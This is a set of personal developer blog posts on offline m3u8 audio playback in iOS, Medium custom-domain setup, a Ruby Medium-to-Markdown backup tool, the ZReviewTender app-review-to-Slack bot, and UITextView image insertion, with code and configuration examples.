Interested parties can refer to this article.
This method cannot be precisely called “caching while playing.” It actually involves downloading the entire audio file content before starting playback. If it is .m3u8
, as mentioned in Solution 2.2, it cannot be directly downloaded and played locally.
To implement this, you need to use the iOS ≥ 10 API AVAssetDownloadTask.makeAssetDownloadTask
, which will actually package the .m3u8
into .movpkg
and store it locally for user playback.
This is more like offline playback rather than caching.
Additionally, users can view and manage the downloaded packaged audio files from “Settings” -> “General” -> “iPhone Storage” -> APP.
Below is the downloaded video section
For detailed implementation, refer to this example:
The exploration journey above took almost a whole week, going around in circles, almost driving me crazy. Currently, there is no reliable and easy-to-deploy method.
If there are new ideas, I will update!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Take care of your Domain Authority yourself!
A series of ups and downs, this feature was opened in 2012, then closed; reopened in 2021, announced closure again in 2022; recently in 2024, it’s back again, and the official complete setup guide has been updated. You can refer to the latest official documentation for setup, and refer to this article for the domain registration process.
Take advantage of the open period to set it up quickly, as we never know when the official will decide to close it again; existing custom domains are not affected.
I set up https://blog.zhgchg.li in 2021 when the official closed the custom domain feature, but it still works and is usable to this day.
Medium’s official blog announced on 2021/02/17 that Medium is once again allowing creators to bind their own domain names! Whether it’s a creator’s Profile page or Publications, both support customization.
To ensure that readers from all backgrounds understand, here’s a simple explanation of what a custom domain is.
A domain is like an address in the online world; if I enter the address Medium.com, I will go to Medium; now, creators can customize their domain, which is like customizing their address. You can register the address you want and then link it to your Medium account to replace the original address; for example, I use blog.zhgchg.li as my address, and it will lead to my Medium page.
Research shows that this feature was available in the early days around 2012, with a one-time $75 setup fee. However, when I started writing on Medium in 2018, this feature had already been discontinued. Existing users were not affected, so sometimes when browsing Medium, you may see a domain that belongs to you but the website is hosted on Medium, which is pretty cool. It was rumored that this feature was launched for a while and then taken down, possibly due to commercial considerations as having a custom domain could reduce Medium’s visibility.
I noticed that when sharing links to articles, if the article is part of a Publication but the Publication does not have a custom domain set, or if the Profile’s domain is not used, the link will revert to the default medium.com link.
Here is an example of my setup for reference:
blog.zhgchg.li
because the main domain serves another purpose)I initially set up a Publication page, but later removed it. Since I have few followers and limited ability to generate traffic on my own, I heavily rely on search engine traffic from Google and others. If the Publication page also used a Custom Domain, the article links would be under my domain, but my domain is not well-established yet, resulting in poor search rankings and low traffic.
Setting up only the Profile without a Publication has its advantages. The original medium links can still be indexed by Google, and having a link with your own domain allows for a balanced approach. You retain your existing traffic while gradually building the Domain Authority of your domain.
Building authority for a domain takes a long time. I believe this feature is most suitable for those who already have a website service (e.g., musicplayer.com). If you want to build a community, you can directly use Medium, and in this case, a domain like blog.musicplayer.com can be used.
The two scenarios where this feature is suitable are: 1) using the Medium platform to write articles (with increasing customization options) and 2) having a domain with enough Domain Authority that won’t significantly affect SEO.
You can obtain a domain from Namecheap (used as an example in this article) or Godaddy based on your preference. The common price range for a .com domain is approximately $200 to $500 TWD per year. The price varies depending on the domain suffix, length, and rarity, with some rare domains costing millions or even billions.
Domain registration operates on a first-come, first-served basis. Unless a domain name is protected by a trademark in a specific region, it is usually a race to register it. If someone else registers it first, you may need to negotiate a purchase. This has led to a practice known as domain squatting, where individuals register numerous domains and hold them without use, waiting to sell them to others.
Domains require annual payments or can be purchased for multiple years, but there is no option for a lifetime purchase. If you fail to renew the domain, it will be released after the protection period, allowing anyone to register it again.
However, Medium users are unlikely to encounter domain squatting issues, as most users are individuals. I registered using my online account zhgchg.li, which had not been taken. If you do encounter duplicates, you can consider changing the suffix to something like .div/.net, etc.
For the suffix part, you can refer to the List of Internet Top-Level Domains, but having a suffix listed does not guarantee availability for registration. It depends on the regulations of the domain’s country and whether platforms like Namecheap or Godaddy sell domains with that suffix.
For example, .li is the domain for Liechtenstein, and currently, there are no restrictions on who can register a domain. Only Namecheap still offers this domain for sale.
Benefits of being named Li?
By the way, my spelling zhgchg.li is also called Domain Hack; a better example is google => goo.gl.
The one-time $75 setup fee has been canceled, and it has been changed to be available for all Medium paid members (monthly $5 / yearly $50); but I actually prefer the original one-time setup fee QQ; because I am mostly a creator and do not need the subscription privileges of paid members, the monthly and yearly fee system is more burdensome for me, and I am starting to consider joining the paywall project Orz.
What happens if you join the membership plan first and then do not continue to renew after setting up a custom domain?
After testing, the custom domain remains valid even after the membership expires!
First, go to the Namecheap official website to search for a domain name you like:
Get search results:
If the button on the right says “Add To Cart,” it means the domain name is available for registration and can be added to the cart for purchase.
If the button on the right says “Make offer” or “Taken,” it means the domain name has already been registered, so please choose a different suffix or a different domain name:
After adding to the cart, click on “Checkout” at the bottom.
Proceed to the order confirmation page:
AUTO-RENEW
for automatic renewal each year, or you can choose to purchase for a specific number of years.Here are some whois information results for google.com, which can be checked here.
Enter credit card information and click on “Confirm Order.”
You have successfully made the purchase!
You will receive an order summary email.
After logging into your account, click on Account in the upper left corner -> “ Dashboard”
Enter the “Dashboard” and switch to the “Domain List” tab, find the Domain you just purchased, and click on “Manage”.
Once inside, switch to the last tab “Advanced DNS”.
Keep this page open and go back to Medium.
Go to the Medium settings page, locate the “Profile” section, and click on “Get started” in the “Custom domain” part.
For Publications, go to Publications’ “Homepage and settings,” and at the bottom, find the “Custom domain” section.
If it shows “Upgrade,” it means you need to upgrade to a paid user to use this feature.
Access the settings page:
Enter your Domain name, e.g., www.example.com
.
Remember this information and go back to the Namecheap settings page.
In the “Advanced DNS” tab, locate the “HOST RECORDS” section.
Click the “ADD NEW RECORD” button twice to add two new data fields.
Enter the information from Medium:
Click the checkmark on the right to complete the addition.
Check again if there are records in the “HOST RECORDS” section.
If there are records, the Namecheap setup is complete. Go back to the Medium settings page.
Click “Continue” to proceed.
If you see the processing page, it means the setup is complete!
Note that it may take up to 48 hours for the Domain binding DNS settings to take full effect. Accessing the domain may show a 404 error if not yet effective.
Sharing links with a custom domain that is later changed may cause previously shared links to become invalid.
As of 2021/02/24, there are still some issues to be resolved by Medium:
But I believe it’s already functioning correctly 99%!
What happens if you cancel the paid membership… will it expire directly?
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Writing a small tool to back up Medium articles & convert them to Markdown format
I’ve written a project to let you download Medium post and convert it to markdown format easily.
MarkupStyleRender.rb
)A backup tool that can crawl the content of Medium article links or all articles of a Medium user, convert them into Markdown format, and download them along with the images in the articles.
This project and this article are for technical research only. Please do not use it for any commercial purposes or illegal purposes. The author is not responsible for any illegal activities conducted using this tool. This is a disclaimer.
Please ensure you have the rights to use and download the articles before backing them up.
In the third year of managing Medium, I have published over 65 articles; all articles were written directly on the Medium platform without any other backups. Honestly, I have always been afraid that issues with the Medium platform or other factors might cause the disappearance of my hard work over the years.
I had manually backed up before, which was very boring and time-consuming, so I have been looking for a tool that can automatically download and back up all articles, preferably converting them into Markdown format.
Although the official provides an export backup function, the export format can only be used for importing into Medium, not Markdown or common formats, and it does not handle embedded content like Github Gist.
The API provided by Medium is not well-maintained and only offers the Create Post function.
Reasonable, because Medium does not want users to easily transfer content to other platforms.
I found and tried several Chrome Extensions (most of which have been taken down), but the results were not good. First, you have to manually click into each article to back it up, and second, the parsed format had many errors and could not deeply parse Gist source code or back up all images in the articles.
Some expert wrote it in JS, which can achieve basic download and conversion to Markdown functionality, but still lacks image backup and deep parsing of Gist Source Code.
After struggling to find a perfect solution, I decided to write a backup conversion tool myself; it took about three weeks of after-work time to complete using Ruby.
How to get the article list by entering the username?
Obtain UserID: View the user’s homepage (https://medium.com/@#{username}) source code to find the Username
corresponding to the UserID
Note that because Medium reopened custom domains, you need to handle 30X redirects
Sniffing network requests reveals that Medium uses GraphQL to get the homepage article list information
1
+2
+
HOST: https://medium.com/_/graphql
+METHOD: POST
+
You can only get 10 items at a time, so you need to paginate.
result[0]->userResult->homepagePostsConnection->posts
homepagePostsFrom
pagination information: can be obtained in result[0]->userResult->homepagePostsConnection->pagingInfo->next
Include homepagePostsFrom
in the request to paginate, nil
means there are no more pagesHow to parse article content?
Viewing the article source code reveals that Medium uses the Apollo Client service for setup; its HTML is actually rendered from JS; therefore, you can find the window.__APOLLO_STATE__
field in the
We need to do the same, parse this JSON, match the Type to the Markdown style, and assemble the Markdown format.
A technical difficulty here is rendering paragraph text styles, where Medium provides the structure as follows:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+
"Paragraph": {
+ "text": "code in text, and link in text, and ZhgChgLi, and bold, and I, only i",
+ "markups": [
+ {
+ "type": "CODE",
+ "start": 5,
+ "end": 7
+ },
+ {
+ "start": 18,
+ "end": 22,
+ "href": "http://zhgchg.li",
+ "type": "LINK"
+ },
+ {
+ "type": "STRONG",
+ "start": 50,
+ "end": 63
+ },
+ {
+ "type": "EM",
+ "start": 55,
+ "end": 69
+ }
+ ]
+}
+
This means that for the text code in text, and link in text, and ZhgChgLi, and bold, and I, only i
:
1
+2
+3
+4
+
- Characters 5 to 7 should be marked as code (wrapped in `Text` format)
+- Characters 18 to 22 should be marked as a link (wrapped in [Text](URL) format)
+- Characters 50 to 63 should be marked as bold (wrapped in *Text* format)
+- Characters 55 to 69 should be marked as italic (wrapped in _Text_ format)
+
Characters 5 to 7 & 18 to 22 are easy to handle in this example because they do not overlap; but 50–63 & 55–69 will have overlapping issues, and Markdown cannot represent overlapping in the following way:
1
+
code `in` text, and [ink](http://zhgchg.li) in text, and ZhgChgLi, and **bold,_ and I, **only i_
+
The correct combination result is as follows:
1
+
code `in` text, and [ink](http://zhgchg.li) in text, and ZhgChgLi, and **bold,_ and I, _**_only i_
+
50–55 STRONG 55–63 STRONG, EM 63–69 EM
Additionally, please note:
**
at both the beginning and end. If it is a Link, the beginning will be [
and the end will be ](URL)
.This has been studied for a long time, and for now, we are using an existing package to solve it reverse_markdown.
Special thanks to former colleagues Nick , Chun-Hsiu Liu , and James for their collaborative research. I will write and convert it to native code when I have time.
Original text -> Converted Markdown result
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Real-time monitoring of the latest app reviews and providing instant feedback to improve collaboration efficiency and consumer satisfaction
App Reviews to Slack Channel
ZReviewTender — Automatically monitors the latest user reviews of App Store iOS/macOS apps and Google Play Android apps, and provides continuous integration tools to integrate into team workflows, improving collaboration efficiency and consumer satisfaction.
Problem:
Reviews in the marketplace are very important for products, but it is a very manual and repetitive task to communicate and refer.
Because you have to manually check for new reviews from time to time, and if there are customer service issues, forward them to customer service for assistance. It’s repetitive and manual.
Through the ZReviewTender review bot, reviews are automatically forwarded to the Slack Channel, allowing everyone to quickly receive the latest review information, and track and discuss in real-time. It also allows the entire team to understand the current user reviews and suggestions for the product.
For more information, refer to: 2021 Pinkoi Tech Career Talk — High-Efficiency Engineering Team Demystified.
If you only need the default features of ZReviewTender (to Slack/Google Translate/Filter), you can use the following quick deployment method.
ZReviewTender has been packaged and released on RubyGems, and you can quickly and easily install and use ZReviewTender with RubyGems.
Click the “Use this template” button at the top right.
⚠️⚠️ Be sure to create a Private Repo ⚠️⚠️
Because you will upload settings and private keys to the project
Finally, click the “Create repository from template” button at the bottom.
Confirm that the Repo name at the top right shows “🔒” and the Private label.
If not, it means you created a Public Repo which is very dangerous, please go to the top Tab “Settings” -> “General” -> Bottom “Danger Zone” -> “Change repository visibility” -> “Make private” to change it back to Private Repo.
You can check the Badge in the Readme on the Repo homepage
If it shows passing, it means init was successful.
Or click the top Tab “Actions” -> wait for the “Init ZReviewTender” Workflow to complete:
Execution status will change to 3 “✅ Init ZReviewTender” -> Project init successful.
Click the “Code” tab above to return to the project directory. If the project init is successful, you will see:
config/
config/android.yml
config/apple.yml
latestCheckTimestamp/
latestCheckTimestamp/.keep
android.yml
& apple.yml
Enter the config/
directory to complete the configuration of android.yml
& apple.yml
files.
Click to enter the config YML file you want to edit and click the “✏️” in the upper right corner to edit the file.
Refer to the “ Settings “ section below to complete the configuration of android.yml
& apple.yml
.
After editing, you can directly save the settings by clicking “Commit changes” below.
Upload the corresponding Key files to the config/
directory:
In the config/
directory, select “Add file” -> “Upload files” in the upper right corner.
Upload the corresponding Key and external file paths configured in the config yml to the config/
directory, drag the files to the “upper block” -> wait for the files to upload -> directly “Commit changes” below to save.
After uploading, go back to the /config
directory to check if the files are correctly saved & uploaded.
Click the “Actions” tab above -> select “ZReviewTender” on the left -> select “Run workflow” on the right -> click the “Run workflow” button to execute ZReviewTender once.
After clicking, refresh the webpage and you will see:
Click “ZReviewTender” to view the execution status.
Expand the “ Run ZreviewTender -r
“ block to view the execution log.
Here you can see an error because I haven’t configured my config yml file properly.
Go back and adjust the android/apple config yml, then return to step 6 and trigger the execution again.
Check the log of the “ ZReviewTender -r
“ block to confirm successful execution!
The Slack channel designated to receive the latest review messages will also show an init success message 🎉
Configuration complete! From now on, the latest reviews within the period will be automatically fetched and forwarded to your Slack channel every 6 hours!
You can check the latest execution status at the top of the Readme on the Repo homepage:
If an error occurs, it means there was an execution error. Please go to Actions -> ZReviewTender to view the records; if there is an unexpected error, please create an Issue with the record information, and it will be fixed as soon as possible!
❌❌❌ When an error occurs, Github will also send an email notification, so you don’t have to worry about the bot crashing without anyone noticing!
You can configure the Github Action execution rules according to your needs.
Click on the “Actions” tab above -> “ZReviewTender” on the left -> “ ZReviewTender.yml
“ on the top right
Click the “✏️” on the top right to edit the file.
There are two parameters that can be adjusted:
cron: Set how often to check for new reviews. The default is 15 */6 * * *
, which means it will run every 6 hours and 15 minutes.
You can refer to crontab.guru to configure it according to your needs.
Please note:
- Github Action uses the UTC time zone
- The higher the execution frequency, the more Github Action execution quota will be consumed
run: Set the command to be executed. You can refer to the “ Execution “ section below. The default is ZReviewTender -r
ZReviewTender -r
ZReviewTender -g
ZReviewTender -a
After editing, click “Start commit” on the top right and select “Commit changes” to save the settings.
Refer to the previous section “6. Initialize ZReviewTender (Manually trigger execution once)”
If you are familiar with Gems, you can directly use the following command to install ZReviewTender
1
+
gem install ZReviewTender
+
If you are not familiar with Ruby or Gems, you can follow the steps below to install ZReviewTender
step by step
2.6.5
)which ruby
to confirm that the current Ruby in use is not the system Ruby /usr/bin/ruby
ZReviewTender
1
+
gem install ZReviewTender
+
bundle install
to install related dependencies for ZReviewTenderThe method for creating a Processor can be referred to in the later content of the article.
ZReviewTender — Use a yaml file to configure the Apple/Google review bot.
[Recommendation] Directly use the command at the bottom of the article — “Generate Configuration File”:
1
+
ZReviewTender -i
+
Directly generate blank apple.yml
& android.yml
configuration files.
Refer to the apple.example.yml file:
⚠️ After downloading
apple.example.yml
, remember to rename the file toapple.yml
apple.yml:
1
+2
+3
+4
+5
+6
+
platform: 'apple'
+appStoreConnectP8PrivateKeyFilePath: '' # APPLE STORE CONNECT API PRIVATE .p8 KEY File Path
+appStoreConnectP8PrivateKeyID: '' # APPLE STORE CONNECT API PRIVATE KEY ID
+appStoreConnectIssueID: '' # APPLE STORE CONNECT ISSUE ID
+appID: '' # APP ID
+...
+
appStoreConnectIssueID:
appStoreConnectIssueID
appStoreConnectP8PrivateKeyID & appStoreConnectP8PrivateKeyFilePath:
ZReviewTender
App Manager
Key ID
/AuthKey_XXXXXXXXXX.p8
, Download API Key, and place the file in the same directory as the config yml.appID:
appID: App Store Connect -> App Store -> General -> App Information -> Apple ID
The Google API services used by ZReviewTender (fetching store reviews, Google Translate, Google Sheet) all use Service Account authentication.
You can follow the official steps to create GCP & Service Account to download and save the GCP Service Account credentials (*.json
).
Cloud Translation API
and the Service Account is added.Google Sheets API
, Google Drive API
, and the Service Account is added.Refer to the android.example.yml file:
⚠️ After downloading
android.example.yml
, remember to rename the file toandroid.yml
android.yml:
1
+2
+3
+4
+5
+6
+
platform: 'android'
+packageName: '' # Android App Package Name
+keyFilePath: '' # Google Android Publisher API Credential .json File Path
+playConsoleDeveloperAccountID: '' # Google Console Developer Account ID
+playConsoleAppID: '' # Google Console App ID
+......
+
packageName:
packageName: com.XXXXX
can be obtained from Google Play Console -> Dashboard -> App
playConsoleDeveloperAccountID & playConsoleAppID:
Can be obtained from the URL on the Google Play Console -> Dashboard -> App page:
This will be used to generate a review message link, allowing the team to quickly access the backend review reply page by clicking the link.
keyFilePath:
The most important information, GCP Service Account credential key (*.json
)
Follow the steps in the official documentation to create a Google Cloud Project & Service Account, then go to Google Play Console -> Setup -> API Access to enable the Google Play Android Developer API
and link the project. Download the JSON key from GCP.
Example content of the JSON key:
gcp_key.json:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+
{
+ "type": "service_account",
+ "project_id": "XXXX",
+ "private_key_id": "XXXX",
+ "private_key": "-----BEGIN PRIVATE KEY-----\nXXXX\n-----END PRIVATE KEY-----\n",
+ "client_email": "XXXX@XXXX.iam.gserviceaccount.com",
+ "client_id": "XXXX",
+ "auth_uri": "https://accounts.google.com/o/oauth2/auth",
+ "token_uri": "https://oauth2.googleapis.com/token",
+ "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
+ "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/XXXX.iam.gserviceaccount.com"
+}
+
/gcp_key.json
Key file path, place the file in the same directory as the config yml.1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+
processors:
+ - FilterProcessor:
+ class: "FilterProcessor"
+ enable: true # enable
+ keywordsInclude: [] # keywords you want to filter out
+ ratingsInclude: [] # ratings you want to filter out
+ territoriesInclude: [] # territories you want to filter out
+ - GoogleTranslateProcessor: # Google Translate Processor, will translate review text to your language, you can remove whole block if you don't needed it.
+ class: "GoogleTranslateProcessor"
+ enable: false # enable
+ googleTranslateAPIKeyFilePath: '' # Google Translate API Credential .json File Path
+ googleTranslateTargetLang: 'zh-TW' # Translate to what Language
+ googleTranslateTerritoriesExclude: ["TWN","CHN"] # Review origin Territory (language) that you don't want to translate.
+ - SlackProcessor: # Slack Processor, resend App Review to Slack.
+ class: "SlackProcessor"
+ enable: true # enable
+ slackTimeZoneOffset: "+08:00" # Review Created Date TimeZone
+ slackAttachmentGroupByNumber: "1" # 1~100, how many review message in 1 slack message.
+ slackBotToken: "" # Slack Bot Token, send slack message throught Slack Bot.
+ slackBotTargetChannel: "" # Slack Bot Token, send slack message throught Slack Bot. (recommended, first priority)
+ slackInCommingWebHookURL: "" # Slack In-Comming WebHook URL, Send slack message throught In-Comming WebHook, not recommended, deprecated.
+ ...More Processors...
+
ZReviewTender comes with four processors, and the order affects the data processing flow: FilterProcessor -> GoogleTranslateProcessor -> SlackProcessor -> GoogleSheetProcessor.
FilterProcessor:
Filters the fetched reviews based on specified conditions, only processing reviews that meet the criteria.
FilterProcessor
No need to adjust, points to lib/Processors/ FilterProcessor
.rbtrue
/ false
Enable this processor or notkeyword1
”,“ keyword2
”…] Filters reviews that contain these keywords1
, 2
…] 1~5 Filters reviews that include these ratingszh-hant
”,” TWN
”…] Filters reviews that include these regions (Apple) or languages (Android)GoogleTranslateProcessor:
Translate the reviews into the specified language.
GoogleTranslateProcessor
No adjustment needed, points to lib/Processors/ GoogleTranslateProcessor
.rbtrue
/ false
Enable this Processor or Not/gcp_key.json
GCP Service Account credential key File Path *.json
, place the file in the same directory as the config yml, refer to the Google Play Console JSON key example above. (Please ensure that the service account of the JSON key has Cloud Translation API
permissions)zh-TW
, en
…target translation languagezh-hant
”,” TWN
”…] Territories (Apple) or languages (Android) that do not need translationSlackProcessor:
Forward reviews to Slack.
SlackProcessor
No adjustment needed, points to lib/Processors/ SlackProcessor
.rbtrue
/ false
Enable this Processor or Not+08:00
Review time display time zone1
Set how many Reviews to combine into one message to speed up sending; default is 1 Review per 1 Slack message.xoxb-xxxx-xxxx-xxxx
Slack Bot Token, Slack recommends creating a Slack Bot with postMessages
Scope and using it to send Slack messagesCXXXXXX
Group ID ( not the group name ), the Slack Bot will send to which Channel group; and you need to add your Slack Bot to that grouphttps://hooks.slack.com/services/XXXXX
Use the old InComming WebHookURL to send messages to Slack, note! Slack does not recommend continuing to use this method to send messages.Please note, this is a legacy custom integration — an outdated way for teams to integrate with Slack. These integrations lack newer features and they will be deprecated and possibly removed in the future. We do not recommend their use. Instead, we suggest that you check out their replacement: Slack apps.
Record reviews to Google Sheet.
GoogleSheetProcessor
No adjustment needed, points to lib/Processors/ SlackProcessor
.rbtrue
/ false
Enable this Processor or Not/gcp_key.json
GCP Service Account credential key File Path *.json
, place the file in the same directory as the config yml, refer to the Google Play Console JSON key example above. (Please ensure that the service account of the JSON key has Google Sheets API
, Google Drive API
permissions)+08:00
Review time display time zoneGoogle Sheet ID
Can be obtained from the Google Sheet URL: https://docs.google.com/spreadsheets/d/ googleSheetID
/Sheet1
keyword1
”,“ keyword2
”…] Filter reviews that contain these keywords1
, 2
…] 1~5 Filter reviews that contain these rating scoreszh-hant
”,” TWN
”…] Filter reviews that contain these territories (Apple) or languages (Android)1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
%TITLE% Review Title
+%BODY% Review Content
+%RATING% Review Rating 1~5
+%PLATFORM% Review Source Platform Apple or Android
+%ID% Review ID
+%USERNAME% Review Username
+%URL% Review URL
+%TERRITORY% Review Territory (Apple) or Review Language (Android)
+%APPVERSION% Reviewed App Version
+%CREATEDDATE% Review Creation Date
+
For example, my Google Sheet columns are as follows:
1
+
Review Rating,Review Title,Review Content,Review Information
+
Then values can be set as:
1
+
values: ["%TITLE%","%BODY%","%RATING%","%PLATFORM% - %APPVERSION%"]
+
If you need a custom Processor, please use manual deployment, as the gem version of ZReviewTender is packaged and cannot be dynamically adjusted.
You can refer to lib/Processors/ProcessorTemplate.rb to create your extension:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+
$lib = File.expand_path('../lib', File.dirname(__FILE__))
+
+require "Models/Review"
+require "Models/Processor"
+require "Helper"
+require "ZLogger"
+
+# Add to config.yml:
+#
+# processors:
+# - ProcessorTemplate:
+# class: "ProcessorTemplate"
+# parameter1: "value"
+# parameter2: "value"
+# parameter3: "value"
+# ...
+#
+
+class ProcessorTemplate < Processor
+
+ def initialize(config, configFilePath, baseExecutePath)
+ # init Processor
+ # get parameter from config e.g. config["parameter1"]
+ # configFilePath: file path of config file (apple.yml/android.yml)
+ # baseExecutePath: user execute path
+ end
+
+ def processReviews(reviews, platform)
+ if reviews.length < 1
+ return reviews
+ end
+
+ ## do what you want to do with reviews...
+
+ ## return result reviews
+ return reviews
+ end
+end
+
initialize will provide:
processReviews(reviews, platform):
After fetching new reviews, this function will be called to allow the Processor to handle them. Please return the resulting Reviews after processing.
Review data structure is defined in lib/Models/ Review.rb
XXXterritorXXX
parameter:
If a Processor is not needed: You can set enable: false
or directly remove the Processor Config Block.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
+**Processors execution order can be adjusted according to your needs:**
+e.g. Execute Filter first, then Translation, then Slack, then Log to Google Sheet...
+### Execution
+
+> ⚠️ Use Gem to directly run `ZReviewTender`, if it's a manual deployment project, please use `bundle exec ruby bin/ZReviewTender` to execute.
+
+#### Generate configuration files:
+```css
+ZReviewTender -i
+
Generate apple.yml & android.yml from apple.example.yml & android.example.yml to the config/
directory in the current execution directory.
1
+
ZReviewTender -r
+
apple.yml
& android.yml
settings under /config/
1
+
ZReviewTender --run=configuration file directory
+
apple.yml
& android.yml
settings under /config/
1
+
ZReviewTender -a
+
apple.yml
settings under /config/
1
+
ZReviewTender --apple=apple.yml configuration file location
+
1
+
ZReviewTender -g
+
android.yml
settings under /config/
1
+
ZReviewTender --googleAndroid=android.yml configuration file location
+
1
+
ZReviewTender -d
+
This will delete the Timestamp record file in /latestCheckTimestamp
, returning to the initial state. Re-executing the scraping will receive the init success message again:
1
+
ZReviewTender -v
+
Displays the latest version number of ZReviewTender on RubyGem.
1
+
ZReviewTender -n
+
The first successful execution will send an initialization success message to the specified Slack Channel and generate latestCheckTimestamp/Apple
and latestCheckTimestamp/Android
files in the corresponding execution directory to record the last scraped review Timestamp.
Additionally, an execute.log
will be generated to record execution errors.
Set up a schedule (using crontab) to continuously scrape new reviews. ZReviewTender will scrape new reviews from the last scraped review Timestamp recorded in latestCheckTimestamp
to the current scraping time and update the Timestamp record file.
e.g. crontab: 15 */6 * * * ZReviewTender -r
Additionally, note that since the Android API only provides reviews added or edited in the last 7 days, the schedule cycle should not exceed 7 days to avoid missing reviews.
https://developers.google.com/android-publisher/reply-to-reviews#retrieving_a_set_of_reviews
ZReviewTender App Reviews Automatic Bot
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+
name: ZReviewTender
+on:
+ workflow_dispatch:
+ schedule:
+ - cron: "15 */6 * * *" # Runs every six hours, you can refer to the above crontab to change the settings
+
+jobs:
+ ZReviewTender:
+ runs-on: ubuntu-latest
+ steps:
+ - name: ZReviewTender Automatic Bot
+ uses: ZhgChgLi/ZReviewTender@main
+ with:
+ command: '-r' # Executes Apple & iOS App review check, you can refer to the above to change to other execution commands
+
Be sure to ensure that your configuration files and keys cannot be publicly accessed, as the sensitive information within them could lead to App/Slack permissions being stolen; the author is not responsible for any misuse.
If any unexpected errors occur, please create an Issue with the log information, and it will be fixed as soon as possible!
The tutorial ends here, next is the behind-the-scenes development story.
=========================
I thought last year’s summary of AppStore APP’s Reviews Slack Bot and the related technology implementation of ZReviewsBot — Slack App Review Notification Bot would conclude the integration of the latest App reviews into the company’s workflow; unexpectedly, Apple updated the App Store Connect API this year, allowing this matter to continue evolving.
Last year’s solution for fetching Apple iOS/macOS App reviews:
Following last year’s method, only the second method can be used, but the effect is not perfect; the session will expire, requiring manual periodic updates, and cannot be placed on the CI/CD server because the session will expire immediately if the IP changes.
important-note-about-session-duration by Fastlane
After receiving the news that Apple updated the App Store Connect API this year, I immediately started redesigning the new review bot. In addition to using the official API, I also optimized the previous architecture design and became more familiar with Ruby usage.
It’s very strange, so I had to workaround by first hitting this endpoint to filter out the latest reviews, then hitting List All App Store Versions for an App & List All Customer Reviews for an App Store Version to combine the App version information.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+
require "jwt"
+require "time"
+
+payload = {
+ iss: "client_email field in the GCP API service account key (*.json) file",
+ sub: "client_email field in the GCP API service account key (*.json) file",
+ scope: ["https://www.googleapis.com/auth/androidpublisher"].join(' '),
+ aud: "token_uri field in the GCP API service account key (*.json) file",
+ iat: Time.now.to_i,
+ exp: Time.now.to_i + 60*20
+}
+
+rsa_private = OpenSSL::PKey::RSA.new("private_key field in the GCP API service account key (*.json) file")
+token = JWT.encode payload, rsa_private, 'RS256', header_fields = {kid:"private_key_id field in the GCP API service account key (*.json) file", typ:"JWT"}
+
+uri = URI("token_uri field in the GCP API service account key (*.json) file")
+https = Net::HTTP.new(uri.host, uri.port)
+https.use_ssl = true
+request = Net::HTTP::Post.new(uri)
+request.body = "grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer&assertion=#{token}"
+
+response = https.request(request).read_body
+
+bearer = result["access_token"]
+
+### use bearer token
+
+uri = URI("https://androidpublisher.googleapis.com/androidpublisher/v3/applications/APP_PACKAGE_NAME/reviews")
+https = Net::HTTP.new(uri.host, uri.port)
+https.use_ssl = true
+
+request = Net::HTTP::Get.new(uri)
+request['Authorization'] = "Bearer #{bearer}";
+
+response = https.request(request).read_body
+
+result = JSON.parse(response)
+
+# success!
+
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Practical Route
The app has a discussion area where users can post articles. The interface for posting articles needs to support text input, inserting multiple images, and text wrapping with images.
What? You say Chapter One? Isn’t it just using UITextView to achieve the editor functionality, why does it need to be divided into “chapters”? Yes, that was my initial reaction too, until I started working on it and realized it wasn’t that simple. It troubled me for two weeks, searching through various resources both domestic and international before finding a solution. Let me narrate my journey…
If you want to know the final solution directly, please skip to the last chapter (scroll down down down down).
Of course, the text editor uses the UITextView component. Looking at the documentation, UITextView’s attributedText comes with an NSTextAttachment object that can attach images to achieve text wrapping effects. The code is also very simple:
1
+2
+3
+
let imageAttachment = NSTextAttachment()
+imageAttachment.image = UIImage(named: "example")
+self.contentTextView.attributedText = NSAttributedString(attachment: imageAttachment)
+
At first, I was quite happy thinking it was simple and convenient; but the problems were just beginning:
1
+2
+3
+4
+
let range = self.contentTextView.selectedRange.location ?? NSRange(location: 0, length: 0)
+let combination = NSMutableAttributedString(attributedString: self.contentTextView.attributedText) // Get current content
+combination.insert(NSAttributedString(attachment: imageAttachment), at: range)
+self.contentTextView.attributedText = combination // Write back
+
1
+2
+3
+
class UploadImageNSTextAttachment:NSTextAttachment {
+ var uuid:String?
+}
+
When uploading an image, change to:
1
+2
+3
+
let id = UUID().uuidString
+let attachment = UploadImageNSTextAttachment()
+attachment.uuid = id
+
Once we can identify the corresponding NSTextAttachment, we can search for the NSTextAttachment in the attributedText for the failed upload image, find it, and replace it with an error icon or remove it directly.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+
if let content = self.contentTextView.attributedText {
+ content.enumerateAttributes(in: NSMakeRange(0, content.length), options: NSAttributedString.EnumerationOptions(rawValue: 0)) { (object, range, stop) in
+ if object.keys.contains(NSAttributedStringKey.attachment) {
+ if let attachment = object[NSAttributedStringKey.attachment] as? UploadImageNSTextAttachment,attachment.uuid == "targetID" {
